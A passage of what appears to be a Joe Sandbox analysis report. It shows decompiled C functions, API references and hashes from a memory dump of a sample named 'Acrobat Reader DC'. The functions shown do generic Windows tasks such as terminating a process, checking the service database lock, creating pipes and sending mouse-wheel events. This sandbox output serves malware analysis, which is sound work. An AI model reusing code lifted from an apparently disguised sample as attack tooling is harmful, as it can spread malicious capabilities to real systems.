                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                  • String ID:
                                  • API String ID: 3495660284-0
                                  • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                  • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                  • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                  • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433FCE Relevance: 9.0, APIs: 6, Instructions: 40windowtimethreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00433FCE(struct HWND__* _a4) {
				long _v8;
				long _v12;
				long _t7;
				struct HWND__* _t14;
				void* _t15;

				_t14 = _a4;
				PostMessageW(_t14, 0x10, 0, 0);
				_t7 = SendMessageTimeoutW(_t14, 0x10, 0, 0, 2, 0x1f4,  &_v12);
				if(_t7 == 0) {
					GetWindowThreadProcessId(_t14,  &_v8);
					_t15 = OpenProcess(0x1f0fff, 0, _v8);
					TerminateProcess(_t15, 0);
					return CloseHandle(_t15);
				}
				return _t7;
			}








                                  0x00433fd5
                                  0x00433fdf
                                  0x00433ff7
                                  0x00433fff
                                  0x00434006
                                  0x0043401d
                                  0x00434022
                                  0x00000000
                                  0x00434029
                                  0x00434033

                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00433FDF
                                  • SendMessageTimeoutW.USER32 ref: 00433FF7
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00434006
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00434017
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00434022
                                  • CloseHandle.KERNEL32(00000000), ref: 00434029
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                  • String ID:
                                  • API String ID: 839392675-0
                                  • Opcode ID: 270ea397f99f845c81f96666f75a121d30ac61d95b76d5fc1fdfa9076574b2da
                                  • Instruction ID: 6d7c31bbfa6b3b8114dad7b7c2ee08b650c76bc0f6a005f10e60d9b42b3e3825
                                  • Opcode Fuzzy Hash: 270ea397f99f845c81f96666f75a121d30ac61d95b76d5fc1fdfa9076574b2da
                                  • Instruction Fuzzy Hash: 90F01D75681218BBE6215BA09D0AFEE776CAF09B01F104569FF01B61C1E7F42A0247AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00432FEE Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00432FEE() {
				void* _t3;
				void* _t9;
				void* _t11;

				_t9 = 0;
				_t11 = OpenSCManagerW(0, 0, 8);
				if(_t11 == 0) {
					L6:
					return _t9;
				} else {
					_t3 = LockServiceDatabase(_t11);
					if(_t3 == 0) {
						if(GetLastError() == 0x41f) {
							_t9 = 1;
						}
						CloseServiceHandle(_t11);
						goto L6;
					} else {
						UnlockServiceDatabase(_t3);
						CloseServiceHandle(_t11);
						return 1;
					}
				}
			}






                                  0x00432ff6
                                  0x00432ffe
                                  0x00433002
                                  0x0043303b
                                  0x0043303e
                                  0x00433004
                                  0x00433005
                                  0x0043300d
                                  0x0043302f
                                  0x00433031
                                  0x00433031
                                  0x00433034
                                  0x00000000
                                  0x0043300f
                                  0x00433010
                                  0x00433019
                                  0x00433023
                                  0x00433023
                                  0x0043300d

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A90E8,14000000,0042E252), ref: 00432FF8
                                  • LockServiceDatabase.ADVAPI32(00000000), ref: 00433005
                                  • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00433010
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00433019
                                  • GetLastError.KERNEL32 ref: 00433024
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00433034
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                  • String ID:
                                  • API String ID: 1690418490-0
                                  • Opcode ID: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                  • Instruction ID: 735ec6acd85acabf56193826cd071f2489ef818a13be6dc6b3d06c037ab4ab6a
                                  • Opcode Fuzzy Hash: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                  • Instruction Fuzzy Hash: D5E065315822216BD6261B346E4DBCF37A8EB2F752F141827F701D6250CB998445D7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045FA41 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0045FA41(void* __ecx, void* __eflags, intOrPtr _a4) {
				struct tagMENUITEMINFOW _v52;
				struct HMENU__* _v56;
				int _v60;
				int _v64;
				intOrPtr _v72;
				int _t42;
				signed int _t44;
				void* _t50;
				signed int _t55;
				struct HMENU__* _t61;
				int _t66;
				signed int* _t68;
				struct HMENU__** _t71;

				_t50 = __ecx;
				_v60 = 0xffffffff;
				if(E00434179(__ecx, _a4,  &_v60) == 0) {
					L18:
					__eflags = 0;
					return 0;
				} else {
					_t66 = _v60;
					if(_t66 < 7 || _t66 >  *((intOrPtr*)(_t50 + 0x9d0))) {
						goto L18;
					} else {
						_t71 =  *(_t50 + 0x1b4 + _t66 * 4);
						if(_t71[1] != 1) {
							L16:
							if(DeleteMenu( *_t71, _t66, 0) == 0) {
								goto L18;
							} else {
								 *_t71 = 0;
								_t71[1] = 0xff;
								E0040C600(_t33 | 0xffffffff,  &(_t71[2]), 0);
								E0044422D(_t50, _t66);
								return 1;
							}
						} else {
							_v52.cbSize = 0x30;
							E00412F40( &(_v52.fMask), 0, 0x2c);
							_v52.fMask = 4;
							if(GetMenuItemInfoW( *_t71, _t66, 0,  &_v52) == 0) {
								goto L18;
							} else {
								_t61 = _v52.hSubMenu;
								_t42 = 7;
								_v56 = _t61;
								_v64 = 7;
								if( *((intOrPtr*)(_t50 + 0x9d0)) >= 7) {
									_t18 = _t50 + 0x1d0; // 0x2cf
									_t68 = _t18;
									while(1) {
										_t55 =  *_t68;
										if(_t55 != 0 &&  *_t55 == _t61) {
											_t87 =  *((char*)(_t55 + 4)) - 1;
											if( *((char*)(_t55 + 4)) != 1) {
												DeleteMenu(_t61, _t42, 0);
												 *((char*)( *_t68 + 4)) = 0xff;
												 *( *_t68) = 0;
												_t44 =  *_t68;
												 *((char*)(_t44 + 5)) = 0;
												__eflags = _t44 | 0xffffffff;
												E0040C600(_t44 | 0xffffffff,  *_t68 + 8, 0);
												E0044422D(_t50, _v72);
											} else {
												E0045FA41(_t50, _t87, _t42);
											}
											_t42 = _v64;
										}
										_t42 = _t42 + 1;
										_t68 =  &(_t68[1]);
										_v64 = _t42;
										if(_t42 >  *((intOrPtr*)(_t50 + 0x9d0))) {
											break;
										}
										_t61 = _v56;
									}
									_t66 = _v60;
								}
								goto L16;
							}
						}
					}
				}
			}
















                                  0x0045fa4d
                                  0x0045fa59
                                  0x0045fa68
                                  0x0045fba1
                                  0x0045fba3
                                  0x0045fba9
                                  0x0045fa6e
                                  0x0045fa6e
                                  0x0045fa75
                                  0x00000000
                                  0x0045fa87
                                  0x0045fa87
                                  0x0045fa92
                                  0x0045fb62
                                  0x0045fb70
                                  0x00000000
                                  0x0045fb72
                                  0x0045fb72
                                  0x0045fb78
                                  0x0045fb87
                                  0x0045fb8e
                                  0x0045fb9e
                                  0x0045fb9e
                                  0x0045fa98
                                  0x0045faa1
                                  0x0045faa9
                                  0x0045fabc
                                  0x0045facc
                                  0x00000000
                                  0x0045fad2
                                  0x0045fad2
                                  0x0045fad6
                                  0x0045fadb
                                  0x0045fadf
                                  0x0045fae9
                                  0x0045faeb
                                  0x0045faeb
                                  0x0045faf7
                                  0x0045faf7
                                  0x0045fafb
                                  0x0045fb01
                                  0x0045fb05
                                  0x0045fb15
                                  0x0045fb1d
                                  0x0045fb23
                                  0x0045fb29
                                  0x0045fb2b
                                  0x0045fb37
                                  0x0045fb3a
                                  0x0045fb45
                                  0x0045fb07
                                  0x0045fb0a
                                  0x0045fb0a
                                  0x0045fb4a
                                  0x0045fb4a
                                  0x0045fb4e
                                  0x0045fb4f
                                  0x0045fb52
                                  0x0045fb5c
                                  0x00000000
                                  0x00000000
                                  0x0045faf3
                                  0x0045faf3
                                  0x0045fb5e
                                  0x0045fb5e
                                  0x00000000
                                  0x0045fae9
                                  0x0045facc
                                  0x0045fa92
                                  0x0045fa75

                                  APIs
                                  • _memset.LIBCMT ref: 0045FAA9
                                  • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                  • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                  • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$InfoItem_memset
                                  • String ID: 0
                                  • API String ID: 1173514356-4108050209
                                  • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                  • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                  • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                  • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00443442(signed int* _a4, signed int _a8, long _a12, void* _a16, HANDLE* _a20) {
				struct _SECURITY_ATTRIBUTES _v16;
				signed int _t17;
				void* _t18;
				void* _t20;
				void* _t24;
				void* _t27;
				signed int _t28;
				long _t30;
				HANDLE* _t35;

				_t17 =  *_a4;
				_t30 = _a12;
				_t35 = _a16;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 0;
				_v16.lpSecurityDescriptor = 0;
				if((_t17 & 0x00000010) == 0) {
					if((_a8 & _t17) == 0) {
						_t18 = GetStdHandle(_t30);
						 *_t35 = _t18;
						if(_t18 == 0 || _t18 == 0xffffffff) {
							_t20 = CreateFileW("nul", 0x40000000, 2,  &_v16, 3, 0x80, 0);
							 *_t35 = _t20;
							if(_t20 == 0xffffffff || _t20 == 0) {
								goto L3;
							} else {
								goto L10;
							}
						} else {
							goto L2;
						}
					} else {
						_t27 =  *_t35;
						if(_t27 == 0) {
							_t28 = CreatePipe(_a20, _t35,  &_v16, 0);
							if(_t28 != 0) {
								L10:
								E004325E0( *_t35,  &_a16, 1);
								E00432614(_t35);
								_t24 = _a16;
								 *_t35 = _t24;
								return _t24;
							} else {
								return _t28 | 0xffffffff;
							}
						} else {
							return _t27;
						}
					}
				} else {
					_t18 = GetStdHandle(_t30);
					 *_t35 = _t18;
					if(_t18 == 0xffffffff) {
						L3:
						 *_t35 = 0;
						return  *_t35;
					} else {
						L2:
						E004325E0(_t18, _t35, 1);
						return  *_t35;
					}
				}
			}












                                  0x0044344b
                                  0x0044344d
                                  0x00443451
                                  0x00443454
                                  0x0044345b
                                  0x00443462
                                  0x0044346b
                                  0x00443524
                                  0x004434c3
                                  0x004434c9
                                  0x004434cd
                                  0x004434ed
                                  0x004434f3
                                  0x004434f8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00443526
                                  0x00443526
                                  0x0044352a
                                  0x004434ae
                                  0x004434b6
                                  0x004434fe
                                  0x00443507
                                  0x0044350d
                                  0x00443512
                                  0x00443518
                                  0x0044351e
                                  0x004434b8
                                  0x004434bf
                                  0x004434bf
                                  0x00443534
                                  0x00443534
                                  0x00443534
                                  0x0044352a
                                  0x00443471
                                  0x00443472
                                  0x00443478
                                  0x0044347d
                                  0x00443494
                                  0x00443494
                                  0x004434a0
                                  0x0044347f
                                  0x0044347f
                                  0x00443483
                                  0x00443491
                                  0x00443491
                                  0x0044347d

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Handle
                                  • String ID: nul
                                  • API String ID: 2519475695-2873401336
                                  • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                  • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                  • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                  • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044334F(signed char* _a4, void* _a8, HANDLE* _a12) {
				struct _SECURITY_ATTRIBUTES _v16;
				signed char _t15;
				void* _t16;
				void* _t18;
				void* _t22;
				void* _t25;
				signed int _t26;
				HANDLE* _t32;

				_t15 =  *_a4;
				_t32 = _a8;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 0;
				_v16.lpSecurityDescriptor = 0;
				if((_t15 & 0x00000010) == 0) {
					if((_t15 & 0x00000001) == 0) {
						_t16 = GetStdHandle(0xfffffff6);
						 *_t32 = _t16;
						if(_t16 == 0 || _t16 == 0xffffffff) {
							_t18 = CreateFileW("nul", 0x80000000, 1,  &_v16, 3, 0x80, 0);
							 *_t32 = _t18;
							if(_t18 == 0xffffffff || _t18 == 0) {
								goto L3;
							} else {
								goto L10;
							}
						} else {
							goto L2;
						}
					} else {
						_t25 =  *_t32;
						if(_t25 == 0) {
							_t26 = CreatePipe(_t32, _a12,  &_v16, 0);
							if(_t26 != 0) {
								L10:
								E004325E0( *_t32,  &_a8, 1);
								E00432614(_t32);
								_t22 = _a8;
								 *_t32 = _t22;
								return _t22;
							} else {
								return _t26 | 0xffffffff;
							}
						} else {
							return _t25;
						}
					}
				} else {
					_t16 = GetStdHandle(0xfffffff6);
					 *_t32 = _t16;
					if(_t16 == 0xffffffff) {
						L3:
						 *_t32 = 0;
						return  *_t32;
					} else {
						L2:
						E004325E0(_t16, _t32, 1);
						return  *_t32;
					}
				}
			}











                                  0x00443358
                                  0x0044335b
                                  0x0044335e
                                  0x00443365
                                  0x0044336c
                                  0x00443375
                                  0x0044342f
                                  0x004433cf
                                  0x004433d5
                                  0x004433d9
                                  0x004433f9
                                  0x004433ff
                                  0x00443404
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00443431
                                  0x00443431
                                  0x00443435
                                  0x004433b9
                                  0x004433c1
                                  0x0044340a
                                  0x00443413
                                  0x00443419
                                  0x0044341e
                                  0x00443424
                                  0x0044342a
                                  0x004433c3
                                  0x004433ca
                                  0x004433ca
                                  0x0044343f
                                  0x0044343f
                                  0x0044343f
                                  0x00443435
                                  0x0044337b
                                  0x0044337d
                                  0x00443383
                                  0x00443388
                                  0x0044339f
                                  0x0044339f
                                  0x004433ab
                                  0x0044338a
                                  0x0044338a
                                  0x0044338e
                                  0x0044339c
                                  0x0044339c
                                  0x00443388

                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Handle
                                  • String ID: nul
                                  • API String ID: 2519475695-2873401336
                                  • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                  • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                  • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                  • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00440C49(intOrPtr _a4, struct HWND__** _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, long _a40) {
				signed int _t13;
				struct HWND__* _t16;
				int _t20;
				WCHAR* _t24;
				intOrPtr _t25;
				intOrPtr _t29;
				struct HWND__** _t37;

				_t13 = _a36;
				_t29 = _a32;
				_t25 = _a28;
				_t24 = _a16;
				_t37 = _a8;
				if(_t13 != 0xffffffff) {
					if(_t13 < 0x10) {
						goto L13;
					}
				} else {
					_t13 = 2;
					L13:
					_t13 = _t13 | 0x00000002;
				}
				if(_t25 == 0xffffffff) {
					_t25 = 0x96;
				}
				if(_t29 == 0xffffffff) {
					_t29 = 0x96;
				}
				if(_a40 >= 0) {
					if( *_t24 == 0) {
						goto L19;
					} else {
						_t16 = E004301F8(_a4, 0, L"SysAnimate32", 0, _t13, _a20, _a24, _t25, _t29, _a12, 0);
						 *_t37 = _t16;
						if(_t16 == 0) {
							L8:
							return 0;
						} else {
							if(SendMessageW(_t16, 0x467, 0, _t24) != 0) {
								L9:
								if( *0x4a8638 == 0) {
									_t37[0x1f] = 0x300;
								}
								return 1;
							} else {
								_t20 = LoadLibraryW(_t24);
								if(_t20 == 0 || SendMessageW( *_t37, 0x467, _t20, _a40) != 0) {
									goto L9;
								} else {
									DestroyWindow( *_t37);
									goto L8;
								}
							}
						}
					}
				} else {
					L19:
					return 0;
				}
			}










                                  0x00440c4c
                                  0x00440c4f
                                  0x00440c52
                                  0x00440c56
                                  0x00440c5a
                                  0x00440c60
                                  0x00440d07
                                  0x00000000
                                  0x00000000
                                  0x00440c66
                                  0x00440c66
                                  0x00440d09
                                  0x00440d09
                                  0x00440d09
                                  0x00440d0f
                                  0x00440d11
                                  0x00440d11
                                  0x00440d19
                                  0x00440d1b
                                  0x00440d1b
                                  0x00440d24
                                  0x00440c74
                                  0x00000000
                                  0x00440c7a
                                  0x00440c99
                                  0x00440c9e
                                  0x00440ca2
                                  0x00440ce0
                                  0x00440ce6
                                  0x00440ca4
                                  0x00440cb7
                                  0x00440ce9
                                  0x00440cf0
                                  0x00440cf7
                                  0x00440cf7
                                  0x00440d01
                                  0x00440cb9
                                  0x00440cba
                                  0x00440cc2
                                  0x00000000
                                  0x00440cd7
                                  0x00440cda
                                  0x00000000
                                  0x00440cda
                                  0x00440cc2
                                  0x00440cb7
                                  0x00440ca2
                                  0x00440d2b
                                  0x00440d2b
                                  0x00440d2f
                                  0x00440d2f

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: SysAnimate32
                                  • API String ID: 0-1011021900
                                  • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                  • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                  • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                  • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0043333C(intOrPtr _a4) {
				long _t2;
				long _t3;
				void* _t7;

				_t8 = _a4;
				_t2 = E004114AB(_t7, _a4, L"UP");
				if(_t2 != 0) {
					_t3 = E004114AB(_t7, _t8, L"DOWN");
					if(_t3 != 0) {
						return 0;
					} else {
						mouse_event(0x800, _t3, _t3, 0xffffff88, _t3);
						return 1;
					}
				} else {
					mouse_event(0x800, _t2, _t2, 0x78, _t2);
					return 1;
				}
			}






                                  0x00433340
                                  0x00433349
                                  0x00433353
                                  0x00433375
                                  0x0043337f
                                  0x0043336e
                                  0x00433381
                                  0x0043338b
                                  0x00433395
                                  0x00433395
                                  0x00433355
                                  0x0043335f
                                  0x00433369
                                  0x00433369

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicollmouse_event
                                  • String ID: DOWN
                                  • API String ID: 1033544147-711622031
                                  • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                  • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                  • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                  • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E0044C37A(signed char _a4, signed int _a8) {
				short _v16;
